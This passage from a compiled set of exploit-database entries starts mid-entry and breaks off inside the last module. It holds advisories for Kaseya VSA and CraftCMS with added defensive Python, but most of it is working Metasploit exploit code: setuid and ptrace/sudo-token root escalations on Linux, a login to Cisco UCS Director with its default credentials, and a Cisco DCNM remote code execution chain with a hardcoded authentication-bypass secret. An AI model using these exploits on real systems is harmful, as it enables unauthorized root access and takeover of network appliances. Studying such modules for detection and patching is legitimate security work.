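        print(f"{'ALLOW' if allowed else 'DENY ':5s} {case}")
```

Two details of the PoC explain why both checks are needed: `multipart/form-data` is a CORS-safelisted content type, so the browser sends the cross-site POST without a preflight and, with `withCredentials`, attaches the victim's cookies; the token check is what the server can rely on, and the `Origin` check is defence in depth for clients that do send it.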
10. # Exploit Title: Kaseya VSA agent <= 9.5 privilege escalation
# Google Dork: N/A
# Date: 2-09-2019
# Exploit Author: NF
# Vendor Homepage: https://www.kaseya.com/products/vsa/
# Software Link: https://www.kaseya.com/products/vsa/
# Version: <= 9.5 agentmon.exe
# Tested on: Windows 10
# CVE : N/A

##Vulnerability##

This is not a new issue as such but more of the same in line with CVE-2017-12410 (https://www.securityfocus.com/archive/1/541884/30/300/threaded) found by Filip Palian. A fix was put in place for the original CVE, however it was specific to binaries and not scripts.

The root cause for both issues is allowing a low privileged group excessive permissions to a folder used by an elevated process.

The Kaseya agent (agentmon.exe) runs as SYSTEM by default. The agent also has a default working folder @ C:\kworking\
It will pull scripts and binaries to this folder and execute them from disk from the controlling web application. By default the *Authenticated Users* group has all rights to this folder.

Scripts are written to disk however they are not checked for integrity prior to execution. So the folder can be monitored for script files being dropped and malicious code appended prior to execution.

##Proof of concept##

This PowerShell script will monitor the default working directory. When a ps1 script drops from a scheduled task or is run from the VSA web application, it will then append the command "Write-Host 'injected content'" which will run as SYSTEM.
Change the Write-Host command to the code to be executed or update the script to target other script drops such as VBScript.

Note: To test you will need to sign up for a trial with VSA to have the ability to deploy an agent & schedule/run scripts

<--script start-->
$folder = 'c:\kworking'
$filter = '*.ps1'
$filesystem = New-Object IO.FileSystemWatcher $folder, $filter -Property @{IncludeSubdirectories = $false; NotifyFilter = [IO.NotifyFilters]'FileName, LastWrite'}
Register-ObjectEvent $filesystem Created -SourceIdentifier FileCreated -Action {
    $path = $Event.SourceEventArgs.FullPath
    "`nWrite-Host 'injected content'" | Out-File -Append -FilePath $path -Encoding utf8
    Unregister-Event FileCreated
}
<--script end-->

##Timeline##
16-06-2019 :: Issue found
18-06-2019 :: security@ emailed requesting steps to disclose
30-06-2019 :: CERT contacted due to non response of vendor from official email address
31-06-2019 :: CERT still unable to contact vendor
07-07-2019 :: CERT makes contact with vendor. Discover security@ address is not monitored by vendor
20-08-2019 :: Vendor confirms receipt of details
27-08-2019 :: Email sent indicating intention to disclose due to lack of response
02-09-2019 :: No response through CERT. Findings published
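The advisory names two missing controls: the folder ACL, and an integrity check on the script before it runs. The ACL is a Windows-specific fix; the integrity check can be shown portably. The following is an added example (not Kaseya code) in Python of the agent-side pattern: the server records a SHA-256 of each script it pushes, the agent reads the file once, hashes those bytes, and executes the very bytes it hashed, so an append between drop and execution (the watcher trick above) is caught and there is no second read for a TOCTOU race to exploit. The function names and the stand-in "executor" are assumptions; the script content is constructed.

```python
import hashlib
import hmac
import tempfile
from pathlib import Path
from typing import Callable, List, Tuple

# Added example, not Kaseya code. The helper names and the executor callback are
# assumptions for the demo; the pushed script text is constructed.


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def push_script(workdir: Path, name: str, source: str) -> Tuple[Path, str]:
    """Server side: write the script to the working folder and return path + expected digest."""
    data = source.encode("utf-8")
    path = workdir / name
    path.write_bytes(data)
    return path, sha256_hex(data)


def attacker_append(path: Path, injected: str = "\nWrite-Host 'injected content'") -> None:
    """The advisory's attack without the watcher: append to the dropped .ps1 before it runs."""
    with path.open("a", encoding="utf-8") as fh:
        fh.write(injected)


def verify_and_run(path: Path, expected_sha256: str, executor: Callable[[bytes], None]) -> bool:
    """Agent side: read once, hash those bytes, run those same bytes or refuse.

    Hashing the file and then re-reading it for execution would leave a window for
    the attacker; passing the already-hashed buffer to the executor closes it.
    """
    data = path.read_bytes()
    if not hmac.compare_digest(sha256_hex(data), expected_sha256):
        return False
    executor(data)
    return True


def simulate(tamper: bool) -> Tuple[bool, List[bytes]]:
    """One push/verify/execute cycle in a temp dir; returns (ran?, list of executed scripts)."""
    executed: List[bytes] = []
    with tempfile.TemporaryDirectory() as tmp:
        workdir = Path(tmp)  # stands in for C:\kworking
        path, digest = push_script(workdir, "task1.ps1", "Get-Service | Out-Null\n")
        if tamper:
            attacker_append(path)
        ran = verify_and_run(path, digest, executed.append)
    return ran, executed


if __name__ == "__main__":
    print("untampered:", simulate(tamper=False)[0])  # True
    print("tampered:  ", simulate(tamper=True)[0])   # False
```

The digest has to travel over the same authenticated channel as the script itself (or be a signature the agent can verify); a hash that the attacker can also rewrite in the working folder adds nothing.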
11. # Exploit Title : CraftCms Users information disclosure From uploaded File
# Author [Discovered By] : Mohammed Abdul Raheem
# Author's [Company Name] : TrekShield IT Solution
# Author [Exploit-db] : https://www.exploit-db.com/?author=9783
# Found Vulnerability On : 20-07-2019
# Vendor Homepage: https://craftcms.com/
# Software Information Link: https://github.com/craftcms/demo
# Software Affected Versions : CraftCms v2 before 2.7.10 and CraftCms v3 before 3.2.6
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : Sensitive information disclosure
# CVE : CVE-2019-14280

####################################################################

# Description about Software :
***************************
Craft is a flexible, user-friendly CMS for creating custom digital experiences on the web and beyond.

####################################################################

# Vulnerability Description :
*****************************
When a user uploads an image in CraftCMS, the uploaded image's EXIF Geolocation Data does not get stripped. As a result, anyone can get sensitive information about CraftCMS's users like their Geolocation, and their Device information like Device Name, Version, Software & Software version used etc.

# Impact :
***********
This vulnerability is CRITICAL and impacts all of Craft's customer base. This vulnerability violates the privacy of a User and shares sensitive information of the user who uploads an image on CraftCMS.

# Steps To Validate :
*********************
1. Login to CraftCMS account.
2. Go to endpoint https://demo.craftcms.com/<token>/s/admin/assets
3. Upload an image which has EXIF Geolocation Data in it.
4. Once the image is uploaded by CraftCMS and hosted on the server, download the image file and check the File Properties.
You can also use a tool like https://www.pic2map.com to view the user's information.

# ATTACHED POC :
****************
https://youtu.be/s-fTdu8R3bU

# More Information Can be found here :
*************************************
https://github.com/craftcms/cms/blob/develop/CHANGELOG-v3.md#326---2019-07-23

###################################################################

# Discovered By Mohammed Abdul Raheem from TrekShield.com
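The location data lives in the Exif APP1 segment of the JPEG, as a GPS sub-IFD referenced from IFD0 by tag 0x8825. The following is an added example (not Craft CMS code) in Python that walks the JPEG segment list, reports whether the Exif block carries a GPS IFD, and strips every APP1..APP15 and COM segment while keeping the JFIF header and the image data, which is what an upload pipeline should do before publishing a file. The sample JPEG is constructed by hand in `build_sample_jpeg` (a minimal marker sequence with a GPSLatitude entry, no real camera data); the function names are assumptions.

```python
import struct
from typing import Iterator, Tuple

# Added example, not Craft CMS code. Tag numbers follow the Exif/TIFF spec; the sample
# JPEG below is constructed and contains no real camera data.
GPS_IFD_POINTER = 0x8825  # IFD0 tag that points at the GPS sub-IFD
SOI, EOI, SOS, APP0, APP1, COM = 0xD8, 0xD9, 0xDA, 0xE0, 0xE1, 0xFE


def jpeg_segments(data: bytes) -> Iterator[Tuple[int, int, int]]:
    """Yield (marker, offset, total length) for each segment up to and including SOS."""
    if data[:2] != b"\xff" + bytes([SOI]):
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("marker expected at offset %d" % pos)
        marker = data[pos + 1]
        if marker == SOS:  # entropy-coded data follows; hand back the remainder whole
            yield marker, pos, len(data) - pos
            return
        seg_len = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        yield marker, pos, 2 + seg_len
        pos += 2 + seg_len


def exif_has_gps(app1_payload: bytes) -> bool:
    """True if the Exif TIFF structure's IFD0 carries a GPS IFD pointer."""
    if not app1_payload.startswith(b"Exif\x00\x00"):
        return False
    tiff = app1_payload[6:]
    endian = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if endian is None:
        return False
    try:
        ifd0 = struct.unpack(endian + "I", tiff[4:8])[0]
        count = struct.unpack(endian + "H", tiff[ifd0:ifd0 + 2])[0]
        for i in range(count):
            off = ifd0 + 2 + 12 * i
            if struct.unpack(endian + "H", tiff[off:off + 2])[0] == GPS_IFD_POINTER:
                return True
    except struct.error:  # truncated or malformed IFD: treat as "no GPS", do not crash
        return False
    return False


def has_gps_exif(jpeg: bytes) -> bool:
    """Scan every APP1 segment (offset + 4 skips marker and length) for a GPS IFD."""
    return any(marker == APP1 and exif_has_gps(jpeg[off + 4:off + length])
               for marker, off, length in jpeg_segments(jpeg))


def strip_metadata(jpeg: bytes) -> bytes:
    """Drop APP1..APP15 and COM segments (Exif, XMP, IPTC, comments); keep JFIF and image data."""
    out = bytearray(jpeg[:2])
    for marker, off, length in jpeg_segments(jpeg):
        if 0xE1 <= marker <= 0xEF or marker == COM:
            continue
        out += jpeg[off:off + length]
    return bytes(out)


def _segment(marker: int, payload: bytes) -> bytes:
    return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload


def build_sample_jpeg() -> bytes:
    """Constructed minimal JPEG: JFIF APP0, Exif APP1 with a GPS IFD, a DQT, SOS and EOI."""
    ifd0_off = 8
    gps_off = ifd0_off + 2 + 2 * 12 + 4   # after IFD0 (2 entries + next-IFD link) = 38
    rat_off = gps_off + 2 + 12 + 4        # after the 1-entry GPS IFD = 56
    tiff = b"II*\x00" + struct.pack("<I", ifd0_off)
    tiff += struct.pack("<H", 2)
    tiff += struct.pack("<HHI4s", 0x010F, 2, 4, b"Cam\x00")  # Make, ASCII, stored inline
    tiff += struct.pack("<HHII", GPS_IFD_POINTER, 4, 1, gps_off)
    tiff += struct.pack("<I", 0)
    tiff += struct.pack("<H", 1) + struct.pack("<HHII", 0x0002, 5, 3, rat_off) + struct.pack("<I", 0)
    tiff += struct.pack("<IIIIII", 51, 1, 30, 1, 0, 1)  # GPSLatitude 51 deg 30' 0" as rationals
    return (b"\xff\xd8"
            + _segment(APP0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
            + _segment(APP1, b"Exif\x00\x00" + tiff)
            + _segment(0xDB, b"\x00" + bytes(64))
            + _segment(SOS, b"\x01\x01\x00\x00\x3f\x00") + b"\x12\x34\x56"
            + b"\xff\xd9")


if __name__ == "__main__":
    sample = build_sample_jpeg()
    print("GPS in upload:", has_gps_exif(sample))            # True
    print("GPS after strip:", has_gps_exif(strip_metadata(sample)))  # False
```

Stripping on upload rather than on download is the right place for this: once the original file has been served, its metadata is already in someone's cache.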
12.
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ktsuss suid Privilege Escalation',
      'Description'    => %q{
        This module attempts to gain root privileges by exploiting
        a vulnerability in ktsuss versions 1.4 and prior.

        The ktsuss executable is setuid root and does not drop
        privileges prior to executing user specified commands,
        resulting in command execution with root privileges.

        This module has been tested successfully on:

        ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and
        ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'John Lightsey', # Discovery and exploit
          'bcoles'         # Metasploit
        ],
      'DisclosureDate' => '2011-08-13',
      'References'     =>
        [
          ['CVE', '2011-2921'],
          ['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'],
          ['URL', 'https://security.gentoo.org/glsa/201201-15'],
          ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh']
        ],
      'Platform'       => ['linux'],
      'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['Auto', {}]],
      'DefaultOptions' =>
        {
          'AppendExit'       => true,
          'PrependSetresuid' => true,
          'PrependSetresgid' => true,
          'PrependSetreuid'  => true,
          'PrependSetuid'    => true,
          'PrependFork'      => true
        },
      'DefaultTarget'  => 0))
    register_options [
      OptString.new('KTSUSS_PATH', [true, 'Path to ktsuss executable', '/usr/bin/ktsuss'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def ktsuss_path
    datastore['KTSUSS_PATH']
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
  end

  def check
    unless setuid? ktsuss_path
      vprint_error "#{ktsuss_path} is not setuid"
      return CheckCode::Safe
    end
    vprint_good "#{ktsuss_path} is setuid"

    # Ask ktsuss to run `id` as ourselves: a fixed build drops to the session
    # user, a vulnerable one still reports uid=0.
    id = cmd_exec 'whoami'
    res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s
    vprint_status res

    unless res.include? 'uid=0'
      return CheckCode::Safe
    end

    CheckCode::Vulnerable
  end

  def exploit
    unless check == CheckCode::Vulnerable
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    payload_name = ".#{rand_text_alphanumeric 10..15}"
    payload_path = "#{base_dir}/#{payload_name}"
    upload_and_chmodx payload_path, generate_payload_exe

    print_status 'Executing payload ...'
    id = cmd_exec 'whoami'
    res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo "
    vprint_line res
  end
end
```
13.
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'net/ssh'
require 'net/ssh/command_stream'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::SSH

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Cisco UCS Director default scpuser password",
      'Description'    => %q{
        This module abuses a known default password on Cisco UCS Director. The 'scpuser'
        has the password of 'scpuser', and allows an attacker to login to the virtual appliance
        via SSH.
        This module has been tested with Cisco UCS Director virtual machines 6.6.0 and 6.7.0.
        Note that Cisco also mentions in their advisory that their IMC Supervisor and
        UCS Director Express are also affected by these vulnerabilities, but this module
        was not tested with those products.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2019-1935' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190821-imcs-usercred' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Aug/36' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/cisco-ucs-rce.txt' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Payload'        =>
        {
          'Compat' => {
            'PayloadType'    => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          [ 'Cisco UCS Director < 6.7.2.0', {} ],
        ],
      'Privileged'     => false,
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 21 2019'
    ))

    register_options(
      [
        Opt::RPORT(22),
        OptString.new('USERNAME', [true, "Username to login with", 'scpuser']),
        OptString.new('PASSWORD', [true, "Password to login with", 'scpuser']),
      ], self.class
    )

    register_advanced_options(
      [
        OptBool.new('SSH_DEBUG', [false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  def rhost
    datastore['RHOST']
  end

  def rport
    datastore['RPORT']
  end

  def do_login(user, pass)
    factory = ssh_socket_factory
    opts = {
      :auth_methods    => ['password', 'keyboard-interactive'],
      :port            => rport,
      :use_agent       => false,
      :config          => false,
      :password        => pass,
      :proxy           => factory,
      :non_interactive => true,
      :verify_host_key => :never
    }

    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']

    begin
      ssh = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(rhost, user, opts)
      end
    rescue Rex::ConnectionError
      return
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
      return
    rescue ::Timeout::Error
      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
      return
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:#{rport} SSH - Failed authentication"
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
      return
    end

    if ssh
      conn = Net::SSH::CommandStream.new(ssh)
      ssh = nil
      return conn
    end

    return nil
  end

  def exploit
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    print_status("#{rhost}:#{rport} - Attempt to login to the Cisco appliance...")
    conn = do_login(user, pass)
    if conn
      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
      handler(conn.lsock)
    end
  end
end
```
14.
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Kernel
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ptrace Sudo Token Privilege Escalation',
      'Description'    => %q{
        This module attempts to gain root privileges by blindly injecting into
        the session user's running shell processes and executing commands by
        calling `system()`, in the hope that the process has valid cached sudo
        tokens with root privileges.

        The system must have gdb installed and permit ptrace.

        This module has been tested successfully on:

        Debian 9.8 (x64); and
        CentOS 7.4.1708 (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'chaignc', # sudo_inject
          'bcoles'   # Metasploit
        ],
      'DisclosureDate' => '2019-03-24',
      'References'     =>
        [
          ['EDB', '46989'],
          ['URL', 'https://github.com/nongiach/sudo_inject'],
          ['URL', 'https://www.kernel.org/doc/Documentation/security/Yama.txt'],
          ['URL', 'http://man7.org/linux/man-pages/man2/ptrace.2.html'],
          ['URL', 'https://lwn.net/Articles/393012/'],
          ['URL', 'https://lwn.net/Articles/492667/'],
          ['URL', 'https://linux-audit.com/protect-ptrace-processes-kernel-yama-ptrace_scope/'],
          ['URL', 'https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html']
        ],
      'Platform'       => ['linux'],
      'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['Auto', {}]],
      'DefaultOptions' =>
        {
          'PrependSetresuid' => true,
          'PrependSetresgid' => true,
          'PrependFork'      => true,
          'WfsDelay'         => 30
        },
      'DefaultTarget'  => 0))
    register_options [
      OptInt.new('TIMEOUT', [true, 'Process injection timeout (seconds)', '30'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def timeout
    datastore['TIMEOUT']
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def check
    if yama_enabled?
      vprint_error 'YAMA ptrace scope is restrictive'
      return CheckCode::Safe
    end
    vprint_good 'YAMA ptrace scope is not restrictive'

    if command_exists? '/usr/sbin/getsebool'
      # 2>&1 sends getsebool's stderr to the pipe; the original "2>1" would
      # have created a file named "1" in the working directory instead.
      if cmd_exec("/usr/sbin/getsebool deny_ptrace 2>&1 | /bin/grep -q on && echo true").to_s.include? 'true'
        vprint_error 'SELinux deny_ptrace is enabled'
        return CheckCode::Safe
      end
      vprint_good 'SELinux deny_ptrace is disabled'
    end

    unless command_exists? 'sudo'
      vprint_error 'sudo is not installed'
      return CheckCode::Safe
    end
    vprint_good 'sudo is installed'

    unless command_exists? 'gdb'
      vprint_error 'gdb is not installed'
      return CheckCode::Safe
    end
    vprint_good 'gdb is installed'

    CheckCode::Detected
  end

  def exploit
    unless check == CheckCode::Detected
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    if nosuid? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
    end

    # Find running shell processes
    shells = %w[ash ksh csh dash bash zsh tcsh fish sh]
    system_shells = read_file('/etc/shells').to_s.each_line.map {|line| line.strip }.reject {|line| line.starts_with?('#') }.each {|line| shells << line.split('/').last }
    shells = shells.uniq.reject {|shell| shell.blank?}

    print_status 'Searching for shell processes ...'
    pids = []
    if command_exists? 'pgrep'
      cmd_exec("pgrep '^(#{shells.join('|')})$' -u \"$(id -u)\"").to_s.each_line do |pid|
        pids << pid.strip
      end
    else
      shells.each do |s|
        pidof(s).each {|p| pids << p.strip}
      end
    end

    if pids.empty?
      fail_with Failure::Unknown, 'Found no running shell processes'
    end

    print_status "Found #{pids.uniq.length} running shell processes"
    vprint_status pids.join(', ')

    # Upload payload
    @payload_path = "#{base_dir}/.#{rand_text_alphanumeric 10..15}"
    upload @payload_path, generate_payload_exe

    # Blindly call system() in each shell process
    pids.each do |pid|
      print_status "Injecting into process #{pid} ..."
      cmds = "echo | sudo -S /bin/chown 0:0 #{@payload_path} >/dev/null 2>&1 && echo | sudo -S /bin/chmod 4755 #{@payload_path} >/dev/null 2>&1"
      sudo_inject = "echo 'call system(\"#{cmds}\")' | gdb -q -n -p #{pid} >/dev/null 2>&1"
      res = cmd_exec sudo_inject, nil, timeout
      vprint_line res unless res.blank?

      next unless setuid? @payload_path

      print_good "#{@payload_path} setuid root successfully"
      print_status 'Executing payload...'
      res = cmd_exec "#{@payload_path} & echo "
      vprint_line res
      return
    end

    fail_with Failure::NoAccess, 'Failed to create setuid root shell. Session user has no valid cached sudo tokens.'
  end

  def on_new_session(session)
    if session.type.eql? 'meterpreter'
      session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi'
      session.fs.file.rm @payload_path
    else
      session.shell_command_token "rm -f '#{@payload_path}'"
    end
  ensure
    super
  end
end
```
15.
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Cisco Data Center Network Manager Unauthenticated Remote Code Execution',
      'Description'    => %q{
        DCNM exposes a file upload servlet (FileUploadServlet) at /fm/fileUpload.
        An authenticated user can abuse this servlet to upload a WAR to the Apache Tomcat webapps
        directory and achieve remote code execution as root.

        This module exploits two other vulnerabilities, CVE-2019-1619 for authentication bypass on
        versions 10.4(2) and below, and CVE-2019-1622 (information disclosure) to obtain the correct
        directory for the WAR file upload.

        This module was tested on the DCNM Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), and should
        work on a few versions below 10.4(2). Only version 11.0(1) requires authentication to exploit
        (see References to understand why).
      },
      'Author'         =>
        [
          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2019-1619' ], # auth bypass
          [ 'CVE', '2019-1620' ], # file upload
          [ 'CVE', '2019-1622' ], # log download
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-bypass' ],
          [ 'URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190626-dcnm-codex' ],
          [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/exploits/metasploit/cisco_dcnm_upload_2019.rb' ],
          [ 'URL', 'https://seclists.org/fulldisclosure/2019/Jul/7' ]
        ],
      'Platform'       => 'java',
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'Cisco DCNM 11.1(1)', {} ],
          [ 'Cisco DCNM 11.0(1)', {} ],
          [ 'Cisco DCNM 10.4(2)', {} ]
        ],
      'Privileged'     => true,
      'DefaultOptions' => { 'WfsDelay' => 10 },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jun 26 2019'
    ))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Connect with TLS', true]),
        OptString.new('TARGETURI', [true, "Default server path", '/']),
        OptString.new('USERNAME', [true, "Username for auth (required only for 11.0(1) and above)", 'admin']),
        OptString.new('PASSWORD', [true, "Password for auth (required only for 11.0(1) and above)", 'admin']),
      ])
  end

  def check
    # at the moment this is the best way to detect
    # check if pmreport and fileUpload servlets return a 500 error with no params
    res = send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'fm', 'pmreport'),
      'vars_get' => { 'token' => rand_text_alpha(5..20) },
      'method'   => 'GET'
    )

    if res && res.code == 500
      res = send_request_cgi(
        'uri'    => normalize_uri(target_uri.path, 'fm', 'fileUpload'),
        'method' => 'GET',
      )

      if res && res.code == 500
        return CheckCode::Detected
      end
    end

    CheckCode::Unknown
  end

  def target_select
    if target != targets[0]
      return target
    else
      res = send_request_cgi(
        'uri'    => normalize_uri(target_uri.path, 'fm', 'fmrest', 'about', 'version'),
        'method' => 'GET'
      )
      if res && res.code == 200
        if res.body.include?('version":"11.1(1)')
          print_good("#{peer} - Detected DCNM 11.1(1)")
          print_status("#{peer} - No authentication required, ready to exploit!")
          return targets[1]
        elsif res.body.include?('version":"11.0(1)')
          print_good("#{peer} - Detected DCNM 11.0(1)")
          print_status("#{peer} - Note that 11.0(1) requires valid authentication credentials to exploit")
          return targets[2]
        elsif res.body.include?('version":"10.4(2)')
          print_good("#{peer} - Detected DCNM 10.4(2)")
          print_status("#{peer} - No authentication required, ready to exploit!")
          return targets[3]
        else
          print_error("#{peer} - Failed to detect target version.")
          print_error("Please contact module author or add the target yourself and submit a PR to the Metasploit project!")
          print_error(res.body)
          print_status("#{peer} - We will proceed assuming the version is below 10.4(2) and vulnerable to auth bypass")
          return targets[3]
        end
      end

      fail_with(Failure::NoTarget, "#{peer} - Failed to determine target")
    end
  end

  def auth_v11
    res = send_request_cgi(
      'uri'      => normalize_uri(target_uri.path, 'fm/'),
      'method'   => 'GET',
      'vars_get' => {
        'userName' => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      },
    )

    if res && res.code == 200
      # get the JSESSIONID cookie
      if res.get_cookies
        res.get_cookies.split(';').each do |cok|
          if cok.include?("JSESSIONID")
            return cok
          end
        end
      end
    end
  end

  def auth_v10
    # step 1: get a JSESSIONID cookie and the server Date header
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, 'fm/'),
      'method' => 'GET'
    )

    # step 2: convert the Date header and create the auth hash
    if res && res.headers['Date']
      jsession = res.get_cookies.split(';')[0]
      date = Time.httpdate(res.headers['Date'])
      server_date = date.strftime("%s").to_i * 1000
      print_good("#{peer} - Got sysTime value #{server_date.to_s}")

      # auth hash format:
      # username + sessionId + sysTime + POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF
      session_id = rand(1000..50000).to_s
      md5 = Digest::MD5.digest 'admin' + session_id + server_date.to_s + "POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF"
      md5_str = Base64.strict_encode64(md5)

      # step 3: authenticate our cookie as admin
      # token format: sessionId.sysTime.md5_str.username
      res = send_request_cgi(
        'uri'      => normalize_uri(target_uri.path, 'fm', 'pmreport'),
        'cookie'   => jsession,
        'vars_get' => {
          'token' => "#{session_id}.#{server_date.to_s}.#{md5_str}.admin"
        },
        'method'   => 'GET'
      )

      if res && res.code == 500
        return jsession
      end
    end
  end

  # use CVE-2019-1622 to fetch the logs unauthenticated, and get the WAR upload path from jboss*.log
  def get_war_path
    res = send_request_cgi(
      'uri'    => normalize_uri(target_uri.path, 'fm', 'log', 'fmlogs.zip'),
      'method' => 'GET'
    )

    if res && res.code == 200
      tmp = Tempfile.new
      # we have to drop this into a file first
      # else we will get a Zip::GPFBit3Error if we use an InputStream
      File.binwrite(tmp, res.body)
      Zip::File.open(tmp) do |zis|
        zis.each do |entry|
          if entry.name =~ /jboss[0-9]*\.log/
            fdata = zis.read(entry)
            if fdata[/Started FileSystemDeploymentService for directory ([\w\/\\\-\.:]*)/]
              tmp.close
              tmp.unlink
              return $1.strip
            end
          end
        end
      end
    end
  end

  def exploit
    target = target_select

